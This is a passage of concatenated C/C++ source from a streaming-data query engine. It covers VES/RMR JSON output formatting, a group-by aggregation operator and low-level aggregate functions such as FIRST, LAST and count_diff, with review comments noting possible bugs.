pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%u\"}",field_names[y], ar.r.ui);
else
pos += snprintf(linebuf+pos,MAXLINE-pos," \"%s\": \"%u\"",field_names[y], ar.r.ui);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.ui;
break;
case IP_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%u.%u.%u.%u\"}",field_names[y], ar.r.ui>>24&0xff,
ar.r.ui>>16&0xff,
ar.r.ui>>8&0xff,
ar.r.ui&0xff);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%u.%u.%u.%u\"",field_names[y], ar.r.ui>>24&0xff,
ar.r.ui>>16&0xff,
ar.r.ui>>8&0xff,
ar.r.ui&0xff);
break;
case IPV6_TYPE:
{
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"",field_names[y]);
else
pos += snprintf(linebuf+pos,MAXLINE-pos," \"%s\": \"",field_names[y]);
unsigned x;
unsigned zc=0;
for(x=0;x<4;x++) { if (ar.r.ip6.v[x]==0) zc++;}
if (zc!=4) {
snprintf(linebuf,MAXLINE,"");
for(x=0;x<8;x++) {
unsigned char * a = (unsigned char *) &(ar.r.ip6.v[0]);
unsigned y;
y=((unsigned)a[2*x])<<8|((unsigned) a[2*x+1]);
pos += snprintf(linebuf+pos,MAXLINE-pos,"%04x",y);
if (x<7){
pos += snprintf(linebuf+pos,MAXLINE-pos,":");
}
}
} else {
pos+=snprintf(linebuf+pos,MAXLINE-pos,"::");
}
if(ves_version < 7)
pos += snprintf(linebuf+pos, MAXLINE-pos,"\"}");
else
pos += snprintf(linebuf+pos, MAXLINE-pos,"\"");
}
break;
case USHORT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%u\"}",field_names[y], ar.r.ui);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%u\"}",field_names[y], ar.r.ui);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.ui;
break;
case BOOL_TYPE:
if(ves_version < 7){
if (ar.r.ui==0) {
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"FALSE\"}",field_names[y]);
} else {
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"TRUE\"}",field_names[y]);
}
}else{
if (ar.r.ui==0) {
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"FALSE\"",field_names[y]);
} else {
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"TRUE\"",field_names[y]);
}
}
break;
case ULLONG_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%llu\"}",field_names[y], ar.r.ul);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%llu\"",field_names[y], ar.r.ul);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.ul;
break;
case LLONG_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%lld\"}",field_names[y], ar.r.l);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%lld\"",field_names[y], ar.r.l);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.l;
break;
case FLOAT_TYPE:
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%f\"}",field_names[y], ar.r.f);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%f\"",field_names[y], ar.r.f);
if(y==measurement_interval_pos)
measurement_interval = (double)ar.r.f;
break;
case TIMEVAL_TYPE:
{
gs_float_t t;
t= ar.r.t.tv_usec;
t=t/1000000;
t=t+ar.r.t.tv_sec;
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"%f\"}",field_names[y], t);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"%f\"",field_names[y], t);
}
break;
case VSTR_TYPE:
{
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"{\"name\": \"%s\", \"value\": \"",field_names[y]);
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"%s\": \"",field_names[y]);
int x;
int c;
char * src;
src=(char*)ar.r.vs.offset;
for(x=0;x<ar.r.vs.length;x++){
c=src[x];
if ((c<='~') && (c>=' ')) {
if (pos<MAXLINE-1) {
linebuf[pos]=c;
pos++;
}
} else {
if (pos<MAXLINE-1) {
linebuf[pos]='.';
pos++;
}
}
}
if(ves_version < 7)
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"}");
else
pos += snprintf(linebuf+pos,MAXLINE-pos,"\"");
}
break;
default:
linebuf[0]=0;
break;
}
}
if(ves_version < 7){
snprintf(linebuf+pos, MAXLINE-pos,
"], \"measurementInterval\": %f, \"measurementsForVfScalingVersion\": 1"
"}}}\n", measurement_interval
);
}else{
snprintf(linebuf+pos, MAXLINE-pos,
"}, \"measurementInterval\": %f, \"measurementFieldsVersion\": \"4.0\""
"}}}\n", measurement_interval
);
}
#ifdef RMR_ENABLED
if (rmr_port) {
rmr_sbuf->mtype = rmr_mtype; // fill in the message bits
rmr_sbuf->len = strlen(linebuf) + 1; // our receiver likely wants a nice acsii-z string
memcpy(rmr_sbuf->payload, linebuf, rmr_sbuf->len);
rmr_sbuf->state = 0;
rmr_sbuf = rmr_send_msg( mrc, rmr_sbuf); // send it (send returns an empty payload on success, or the original payload on fail/retry)
while( rmr_sbuf->state == RMR_ERR_RETRY ) { // soft failure (device busy?) retry
rmr_sbuf = rmr_send_msg( mrc, rmr_sbuf); // retry send until it's good (simple test; real programmes should do better)
}
if(rmr_sbuf->state != RMR_OK) {
gslog(LOG_WARNING, "rmr_send_msg() failure, strerror(errno) is %s", strerror(errno));
rmr_post_failure_cnt++;
} else
rmr_post_success_cnt++;
if (((rmr_post_success_cnt+rmr_post_failure_cnt) % STAT_FREQUENCY) == 0)
gslog(LOG_WARNING, "%s: successful RMR posts - %llu, failed RMR posts - %llu", argv[0], rmr_post_success_cnt, rmr_post_failure_cnt);
}
#endif
if(curl_address==NULL){
if (!rmr_port) // if neither VES collector nor RMR is specified print to standard output
emit_line();
}else{
http_post_request_hdr(curl_endpoint, curl_url, linebuf, &http_code, curl_auth);
if(http_code != 200 && http_code != 202){
post_failure_cnt++;
gslog(LOG_WARNING, "http return code is %d",http_code);
} else {
post_success_cnt++;
}
if (((post_success_cnt+post_failure_cnt) % STAT_FREQUENCY) == 0)
gslog(LOG_WARNING, "%s: successful ves posts - %llu, failed ves posts - %llu", argv[0], post_success_cnt, post_failure_cnt);
}
if (verbose!=0) fflush(stdout);
} else {
if (rfta_id.streamid != fta_id.streamid)
fprintf(stderr,"Got unknown streamid %llu \n",rfta_id.streamid);
}
// whenever we receive a temp tuple check if we reached time limit
if ((code==2) && tlimit && (time(NULL)-start_time)>=tlimit) {
fprintf(stderr,"Reached time limit of %d seconds\n",tlimit);
ftaapp_exit();
exit(0);
}
}
}
<file_sep>/** ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef GROUPBY_OPERATOR_H
#define GROUPBY_OPERATOR_H
#include "host_tuple.h"
#include "base_operator.h"
#include <list>
#include "hash_table.h"
using namespace std;
// groupby_operator: streaming GROUP BY / aggregation operator for the HFTA.
// Maintains a hash table mapping group keys to in-progress aggregates; when
// the generated groupby_func reports that the temporal window has advanced
// (flush_needed), all open groups are emitted and the table is restarted.
//
// Template parameters are supplied by generated query code:
//   groupby_func - per-query logic: key extraction, aggregate create/update,
//                  output tuple construction, temporal bookkeeping
//   group        - group-key record type
//   aggregate    - aggregate payload type (needs an operator= doing a deep copy)
//   hasher_func / equal_func - hashing and equality over group keys
template <class groupby_func, class group, class aggregate, class hasher_func, class equal_func>
class groupby_operator : public base_operator {
private :
	groupby_func func;	// generated per-query grouping/aggregation logic
	hash_table<group, aggregate, hasher_func, equal_func> group_table;	// currently open groups
	bool flush_finished;	// reported in temp-status tuples; true when no flush is pending
	typename hash_table<group, aggregate, hasher_func, equal_func>::iterator flush_pos;	// cursor used by flush()
	int n_patterns;	// number of group-by patterns (>1 means grouping sets)

public:
	groupby_operator(int schema_handle, const char* name) : base_operator(name), func(schema_handle) {
		flush_finished = true;
		n_patterns = func.n_groupby_patterns();
	}

	// Consume one input tuple.  Regular tuples update (or create) their
	// group's aggregate; non-group (temporal/status) tuples may trigger a
	// flush of completed groups into `result`.  Always returns 0.
	int accept_tuple(host_tuple& tup, list<host_tuple>& result) {
		// Push out completed groups
		// Extract the key information from the tuple and copy it into grp.
		// create_group returns false for tuples that carry no group (e.g.
		// temporal punctuation / status tuples).
		group grp;
		if (!func.create_group(tup, (gs_sp_t)&grp)) {
			if(func.disordered()){
				// fprintf(stderr,"Out of order record in %s\n",op_name);
				// NOTE(review): returns without tup.free_tuple() -- looks like
				// a possible tuple leak on this path; confirm ownership rules.
				return 0;
			}
			// The temporal window advanced: emit all completed groups.
			if (func.flush_needed()){
				flush_old(result);
			}
			// Propagate a temporal status (heartbeat) tuple downstream.
			if (func.temp_status_received()) {
				host_tuple temp_tup;
				if (!func.create_temp_status_tuple(temp_tup, flush_finished)) {
					temp_tup.channel = output_channel;
					result.push_back(temp_tup);
				}
			}
			tup.free_tuple();
			return 0;
		}
		if(func.disordered()){
			// fprintf(stderr,"Out of order record in %s\n",op_name);
			// NOTE(review): same possible missing free_tuple() as above.
			return 0;
		}
		typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
		if ((iter = group_table.find(grp)) != group_table.end()) {
			// Temporal GBvar is part of the group so no flush is needed.
			func.update_aggregate(tup, grp, (*iter).second);
		}else{
			// New group: if the window just advanced, flush before inserting.
			if (func.flush_needed()) {
				flush_old(result);
			}
			if(n_patterns <= 1){
				char aggr_buffer[sizeof(aggregate)];
				// create an aggregate in preallocated buffer
				func.create_aggregate(tup, aggr_buffer);
				// need operator= doing a deep copy
				group_table.insert(grp, (*(aggregate*)aggr_buffer));
			}else{
				int p;
				// TODO this code is wrong, must check if each pattern is in the group table.
				// (Each pattern-projected group is inserted unconditionally, so a
				// projection that already exists in the table is not updated.)
				for(p=0;p<n_patterns;++p){
					// need shallow copy constructor for groups
					group new_grp(grp, func.get_pattern(p));
					char aggr_buffer[sizeof(aggregate)];
					func.create_aggregate(tup, aggr_buffer);
					// need operator= doing a deep copy
					group_table.insert(new_grp, (*(aggregate*)aggr_buffer));
				}
			}
		}
		tup.free_tuple();
		return 0;
	}

	// Emit an output tuple for every open group, then clear the table.
	int flush(list<host_tuple>& result) {
		host_tuple tup;
		flush_pos = group_table.begin();
		// If the table isn't empty, flush it now.
		if (!group_table.empty()) {
			for (; flush_pos != group_table.end(); ++flush_pos) {
				bool failed = false;
				tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
				if (!failed) {
					tup.channel = output_channel;
					result.push_back(tup);
				}
				// free((*flush_pos).second);
			}
			group_table.clear();
		}
		flush_finished = true;
		return 0;
	}

	// Window-advance flush: also clears and rehashes/shrinks the table.
	int flush_old(list<host_tuple>& result) {
		flush(result);
		group_table.clear();
		group_table.resize();
		return 0;
	}

	// Forward a runtime parameter block to the generated logic.
	int set_param_block(int sz, void * value) {
		func.set_param_block(sz, value);
		return 0;
	}

	// Produce a temporal status (heartbeat) tuple on demand.
	int get_temp_status(host_tuple& result) {
		result.channel = output_channel;
		return func.create_temp_status_tuple(result, flush_finished);
	}

	// Blocked status: always -1 (no blocking state is tracked here).
	int get_blocked_status () {
		return -1;
	}

	// Memory used by the group table, as reported by the table itself.
	unsigned int get_mem_footprint() {
		return group_table.get_mem_footprint();
	}
};
#endif // GROUPBY_OPERATOR_H
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include "rts_udaf.h"
#include "gsconfig.h"
#include "gstypes.h"
#include <stdio.h>
#include <limits.h>
#include <math.h>
#define max(a,b) ((a) > (b) ? (a) : (b))
#define MAX_BUFSIZE 128
/****************************************************************/
/* LFTA functions */
/****************************************************************/
////////////////////////////////////////////////////////////////////////
//// avg_udaf
/* avg_udaf: LFTA-side partial state for a streaming average.
 * The low-level side only accumulates (sum, count); the final division is
 * performed upstream, which receives this struct's raw bytes via OUTPUT. */
typedef struct avg_udaf_lfta_struct_t{
	gs_int64_t sum;
	gs_uint32_t cnt;
} avg_udaf_lfta_struct_t;

/* Zero the accumulator held in the scratchpad b. */
void avg_udaf_lfta_LFTA_AGGR_INIT_(gs_sp_t b){
	avg_udaf_lfta_struct_t *state = (avg_udaf_lfta_struct_t *)b;
	state->cnt = 0;
	state->sum = 0;
}

/* Fold one sample into the running (sum, count). */
void avg_udaf_lfta_LFTA_AGGR_UPDATE_(gs_sp_t b,gs_uint32_t v){
	avg_udaf_lfta_struct_t *state = (avg_udaf_lfta_struct_t *)b;
	state->cnt += 1;
	state->sum += v;
}

/* Never requests an early flush. */
gs_retval_t avg_udaf_lfta_LFTA_AGGR_FLUSHME_(gs_sp_t b){
	return 0;
}

/* Expose the first 12 bytes of the scratchpad (8-byte sum + 4-byte cnt)
 * as an opaque string for transfer upstream. */
void avg_udaf_lfta_LFTA_AGGR_OUTPUT_(struct gs_string *r,gs_sp_t b){
	r->data = b;
	r->length = 12;
}

/* Nothing was allocated, so nothing to release. */
void avg_udaf_lfta_LFTA_AGGR_DESTROY_(gs_sp_t b){
}
/////////////////////////////////////////////////////////
// Moving sum
/* moving_sum: LFTA-side partial state carrying a running sum together with
 * the window parameter N that was supplied on the last update. */
typedef struct moving_sum_lfta_struct{
	gs_uint32_t sum;
	gs_uint32_t N;
} moving_sum_lfta_struct;

/* Reset both the sum and the remembered window parameter. */
void moving_sum_lfta_LFTA_AGGR_INIT_(gs_sp_t b){
	moving_sum_lfta_struct *state = (moving_sum_lfta_struct *)b;
	state->N = 0;
	state->sum = 0;
}

/* Add one sample and remember the most recent N. */
void moving_sum_lfta_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v, gs_uint32_t N){
	moving_sum_lfta_struct *state = (moving_sum_lfta_struct *)b;
	state->sum += v;
	state->N = N;
}

/* Never requests an early flush. */
gs_retval_t moving_sum_lfta_LFTA_AGGR_FLUSHME_(gs_sp_t b){
	return 0;
}

/* Pack (N, sum) into a single 64-bit word: N in the high 32 bits,
 * sum in the low 32 bits. */
void moving_sum_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t *r, gs_sp_t b){
	moving_sum_lfta_struct *state = (moving_sum_lfta_struct *)b;
	gs_uint64_t packed = (gs_uint64_t)state->N;
	packed <<= 32;
	packed |= (gs_uint64_t)state->sum;
	*r = packed;
}

/* Nothing was allocated, so nothing to release. */
gs_retval_t moving_sum_lfta_LFTA_AGGR_DESTROY_(gs_sp_t b){
	return 0;
}
/////////////////////////////////////////////////////////
// FIRST and LAST aggregates
///////////////// FIRST
// uint
/* FIRST aggregate, unsigned int flavor.  The scratchpad holds a single
 * value; UINT_MAX doubles as the "no value seen yet" sentinel.
 * Caveat (pre-existing): a genuine first sample equal to the sentinel is
 * indistinguishable from "uninitialized" and will be overwritten by the
 * next sample. */
void FIRST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch) {
	*scratch = UINT_MAX; // we will encode uninitialized value as UINT_MAX
	return;
}
/* Keep only the first sample; every later sample is ignored. */
void FIRST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
	if (*scratch == UINT_MAX)
		*scratch = val;
	return;
}
/* Never requests an early flush. */
gs_retval_t FIRST_lfta_LFTA_AGGR_FLUSHME_( gs_uint32_t* scratch) { return 0; }
void FIRST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
	*res = *scratch;
}
/* Nothing allocated, nothing to free. */
void FIRST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { return; }

/* FIRST aggregate, signed int flavor; INT_MAX is the sentinel (same caveat
 * as above for a real first value of INT_MAX). */
void FIRST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch) {
	*scratch = INT_MAX; // we will encode uninitialized value as INT_MAX
	return;
}
void FIRST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
	if (*scratch == INT_MAX)
		*scratch = val;
	return;
}
gs_retval_t FIRST_INT_lfta_LFTA_AGGR_FLUSHME_( gs_int32_t* scratch) { return 0; }
void FIRST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
	*res = *scratch;
}
void FIRST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch) { return; }

/* FIRST aggregate, unsigned long long flavor; ULLONG_MAX is the sentinel. */
void FIRST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch) {
	*scratch = ULLONG_MAX; // we will encode uninitialized value as ULLONG_MAX
	return;
}
void FIRST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
	if (*scratch == ULLONG_MAX)
		*scratch = val;
	return;
}
gs_retval_t FIRST_ULL_lfta_LFTA_AGGR_FLUSHME_( gs_uint64_t* scratch) { return 0; }
void FIRST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
	*res = *scratch;
}
void FIRST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { return; }

/* FIRST aggregate, signed long long flavor; LLONG_MAX is the sentinel. */
void FIRST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch) {
	*scratch = LLONG_MAX; // we will encode uninitialized value as LLONG_MAX
	return;
}
void FIRST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
	if (*scratch == LLONG_MAX)
		*scratch = val;
	return;
}
gs_retval_t FIRST_LL_lfta_LFTA_AGGR_FLUSHME_( gs_int64_t* scratch) { return 0; }
void FIRST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
	*res = *scratch;
}
void FIRST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch) { return; }

/* FIRST aggregate, string flavor.  A NULL data pointer is the "no value
 * yet" sentinel; the first value is deep-copied into the scratchpad and
 * all later values are ignored. */
void FIRST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch) {
	scratch->data = NULL;
	return;
}
void FIRST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val) {
	if (!scratch->data) {
		str_assign_with_copy(NULL, scratch, val);
	}
	return;
}
gs_retval_t FIRST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch) { return 0; }
void FIRST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch) {
	*res = *scratch;
}
/* Release the copied string, if one was ever stored. */
void FIRST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch) {
	if (scratch->data)
		fta_free(NULL, scratch->data);
}
///////////////// LAST
// uint
/* LAST aggregate, unsigned int flavor: the scratchpad simply tracks the
 * most recent sample.
 * NOTE(review): INIT leaves the scratchpad uninitialized, so OUTPUT before
 * any UPDATE would return garbage -- presumably the runtime guarantees at
 * least one UPDATE per group; confirm. */
void LAST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch) { }
void LAST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val) {
	*scratch = val;
	return;
}
/* Never requests an early flush. */
gs_retval_t LAST_lfta_LFTA_AGGR_FLUSHME_( gs_uint32_t* scratch) { return 0; }
void LAST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch) {
	*res = *scratch;
}
/* Nothing allocated, nothing to free. */
void LAST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch) { return; }

/* LAST aggregate, signed int flavor (same uninitialized-INIT note). */
void LAST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch) { }
void LAST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val) {
	*scratch = val;
	return;
}
gs_retval_t LAST_INT_lfta_LFTA_AGGR_FLUSHME_( gs_int32_t* scratch) { return 0; }
void LAST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch) {
	*res = *scratch;
}
void LAST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch) { return; }

/* LAST aggregate, unsigned long long flavor. */
void LAST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch) { }
void LAST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val) {
	*scratch = val;
	return;
}
gs_retval_t LAST_ULL_lfta_LFTA_AGGR_FLUSHME_( gs_uint64_t* scratch) { return 0; }
void LAST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch) {
	*res = *scratch;
}
void LAST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch) { return; }

/* LAST aggregate, signed long long flavor. */
void LAST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch) { }
void LAST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val) {
	*scratch = val;
	return;
}
gs_retval_t LAST_LL_lfta_LFTA_AGGR_FLUSHME_( gs_int64_t* scratch) { return 0; }
void LAST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch) {
	*res = *scratch;
}
void LAST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch) { return; }

/* LAST aggregate, string flavor: a NULL data pointer means "no value yet";
 * the first value is deep-copied, later values may replace it. */
void LAST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch) {
	scratch->data = NULL;
	return;
}
void LAST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val) {
	if (!scratch->data) {
		str_assign_with_copy(NULL, scratch, val);
	} else {
		/* NOTE(review): the stored string is replaced only when
		 * str_compare(...) returns 0.  If str_compare follows strcmp
		 * semantics (0 == equal), this re-copies equal strings and keeps
		 * the OLD value when a different one arrives -- the opposite of
		 * what LAST should do.  Confirm str_compare's convention before
		 * relying on this aggregate. */
		if (!str_compare(scratch, val)) {
			fta_free(NULL, scratch->data);
			str_assign_with_copy(NULL, scratch, val);
		}
	}
	return;
}
gs_retval_t LAST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch) { return 0; }
void LAST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch) {
	*res = *scratch;
}
/* Release the copied string, if one was ever stored. */
void LAST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch) {
	if (scratch->data)
		fta_free(NULL, scratch->data);
}
////////////////////////////////////////////////////////
// count_diff aggregate
struct lfta_count_diff_scratch{
gs_uint32_t count;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} first;
union{
gs_uint32_t ui;
gs_int32_t i;
gs_uint64_t ul;
gs_int64_t l;
} last;
};
// unsigned int
void count_diff_lfta_ui_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_ui_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.ui = val;
}else{
if(scratch->last.ui != val)
scratch->count++;
}
scratch->last.ui = val;
}
void count_diff_lfta_ui_LFTA_AGGR_OUTPUT_(struct gs_string * res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_ui_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_ui_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// int
void count_diff_lfta_i_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_i_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.i = val;
}else{
if(scratch->last.i != val)
scratch->count++;
}
scratch->last.i = val;
}
void count_diff_lfta_i_LFTA_AGGR_OUTPUT_(struct gs_string * res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_i_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_i_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// unsigned long long int
void count_diff_lfta_ul_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_ul_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.ul = val;
}else{
if(scratch->last.ul != val)
scratch->count++;
}
scratch->last.ul = val;
}
void count_diff_lfta_ul_LFTA_AGGR_OUTPUT_(struct gs_string * res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_ul_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_ul_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// long long int
void count_diff_lfta_l_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.l = 0;
scratch->last.l = 0;
}
void count_diff_lfta_l_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.l = val;
}else{
if(scratch->last.l != val)
scratch->count++;
}
scratch->last.l = val;
}
void count_diff_lfta_l_LFTA_AGGR_OUTPUT_(struct gs_string* res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_l_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_l_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// string
static gs_uint64_t local_hash_string(struct gs_string *x){
gs_uint32_t i;
gs_uint64_t ret=0,tmp_sum = 0;
for(i=0;i<x->length;++i){
tmp_sum |= (x->data[i]) << (8*(i%4));
if((i%4) == 3){
ret = tmp_sum + 12916008961267169387ull * ret;
tmp_sum = 0;
}
}
if((i%4)!=0) ret = tmp_sum + 12916008961267169387ull * ret;
return(ret);
}
void count_diff_lfta_s_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.ul = 0;
scratch->last.ul = 0;
}
void count_diff_lfta_s_LFTA_AGGR_UPDATE_(gs_sp_t s, struct gs_string* val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
gs_uint64_t hashval;
hashval = local_hash_string(val);
if(scratch->count==0){
scratch->count = 1;
scratch->first.ul = hashval;
}else{
if(scratch->last.ul != hashval)
scratch->count++;
}
scratch->last.ul = hashval;
}
void count_diff_lfta_s_LFTA_AGGR_OUTPUT_(struct gs_string* res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_s_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_s_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
/////////////////////////////////////////////////////////
// running_array_aggr aggregate
/* running_array_aggr: collects up to four unsigned ints per group; FLUSHME
 * signals a flush once all four slots are filled, and OUTPUT ships the
